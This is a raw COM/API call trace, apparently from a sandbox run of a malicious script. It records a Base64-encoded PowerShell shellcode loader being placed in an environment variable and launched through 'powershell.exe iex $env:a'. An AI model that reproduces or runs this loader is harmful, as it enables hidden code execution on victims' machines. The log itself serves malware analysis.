(This=0x2ed9a0) returned 0x1 [0083.014] IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a638 | out: ppvObject=0x18a638*=0x0) returned 0x80004002 [0083.014] IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a5b0 | out: ppvObject=0x18a5b0*=0x0) returned 0x80004002 [0083.014] IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a5b8 | out: ppvObject=0x18a5b8*=0x0) returned 0x80004002 [0083.014] IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a6508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a5c0 | out: ppvObject=0x18a5c0*=0x0) returned 0x80004002 [0083.014] IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a5c8 | out: ppvObject=0x18a5c8*=0x2ee090) returned 0x0 [0083.014] IUnknown:Release (This=0x2ee090) returned 0x1 [0083.014] IUnknown:AddRef (This=0x2ee090) returned 0x2 [0083.014] IDispatch:Invoke (in: This=0x2ee090, dispIdMember=0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x18a858*(rgvarg=([0]=0x18a870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr", varVal2=0x2eda50), [1]=0x18a888*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="a", varVal2=0x2eda50)), rgdispidNamedArgs=([0]=0x18a850*=-3), cArgs=0x2, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18a800, puArgErr=0x18a7f4 | out: pDispParams=0x18a858*(rgvarg=([0]=0x18a870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr", varVal2=0x2eda50), [1]=0x18a888*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="a", varVal2=0x2eda50)), rgdispidNamedArgs=([0]=0x18a850*=-3), cArgs=0x2, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18a800*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a7f4*=0x0) returned 0x0 [0083.015] IUnknown:Release (This=0x2ee090) returned 0x1 [0083.016] IDispatch:GetIDsOfNames (in: This=0x2ed9a0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a970*="Run", cNames=0x1, lcid=0x409, rgDispId=0x18a820 | out: rgDispId=0x18a820*=1000) returned 0x0 [0083.016] IUnknown:AddRef (This=0x2ed9a0) returned 0x2 [0083.016] IDispatch:Invoke (in: This=0x2ed9a0, dispIdMember=1000, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0x18a738*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0x18a750*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe iex $env:a", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x18ac48, pExcepInfo=0x18a6b0, puArgErr=0x18a6a4 | out: pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0x18a738*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0x18a750*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe iex $env:a", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x18ac48*(varType=0x3, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x2ed970), pExcepInfo=0x18a6b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a6a4*=0x0) returned 0x0 [0092.388] IUnknown:Release (This=0x2ed9a0) returned 0x1 [0092.388] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="close", grfdex=0x10000001, pid=0x18a930 | out: pid=0x18a930*=3) returned 0x0 [0092.388] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a698 | out: ppdisp=0x18a698*=0x2ee140) returned 0x0 [0092.388] GetCurrentThreadId () returned 0x678 [0092.388] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a620 | out: ppvObject=0x18a620*=0x2ee140) returned 0x0 [0092.388] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="close", grfdex=0x10000001, pid=0x18a6a8 | out: pid=0x18a6a8*=-1) returned 0x80020006 [0092.388] IUnknown:Release (This=0x2ee140) returned 0x1 [0092.388] IUnknown:Release (This=0x2ee140) returned 0x1 [0092.388] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a698 | out: ppdisp=0x18a698*=0x2ed8d0) returned 0x0 [0092.388] GetCurrentThreadId () returned 0x678 [0092.389] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a620 | out: ppvObject=0x18a620*=0x2ed8d0) returned 0x0 [0092.389] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="close", grfdex=0x10000001, pid=0x18a6a8 | out: pid=0x18a6a8*=-1) returned 0x80020006 [0092.389] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0092.389] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0092.389] IUnknown:AddRef (This=0x3c92c0) returned 0xf [0092.389] IUnknown:AddRef (This=0x3f1d10) returned 0x5 [0092.389] IUnknown:QueryInterface (in: This=0x3f1d10, riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2efd50 | out: ppvObject=0x2efd50*=0x3f1d10) returned 0x0 [0092.389] IUnknown:Release (This=0x3f1d10) returned 0x5 [0092.389] IDispatchEx:InvokeEx (in: This=0x3c92c0, id=3, lcid=0x1, wFlags=0x1, pdp=0x18a860*(rgvarg=0x2ed1f0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x0, pei=0x18a880, pspCaller=0x2efd20 | out: pdp=0x18a860*(rgvarg=0x2ed1f0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x0, pei=0x18a880*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0 [0092.390] IUnknown:Release (This=0x3c92c0) returned 0xe [0092.390] GetCurrentThreadId () returned 0x678 [0092.390] IActiveScriptSite:OnLeaveScript (This=0x3f1d10) returned 0x0 [0092.390] ISystemDebugEventFire:IsActive (This=0x3d8c40) returned 0x1 [0092.390] IUnknown:Release (This=0x3f1d10) returned 0x4 [0092.390] IUnknown:Release (This=0x3f1d10) returned 0x3 [0092.393] IUnknown:Release (This=0x3c9630) returned 0x1 [0092.393] GetCurrentThreadId () returned 0x678 [0092.393] IActiveScriptSite:OnLeaveScript (This=0x3dd030) returned 0x0 [0092.393] ISystemDebugEventFire:IsActive (This=0x3d87e0) returned 0x1 [0092.393] IUnknown:Release 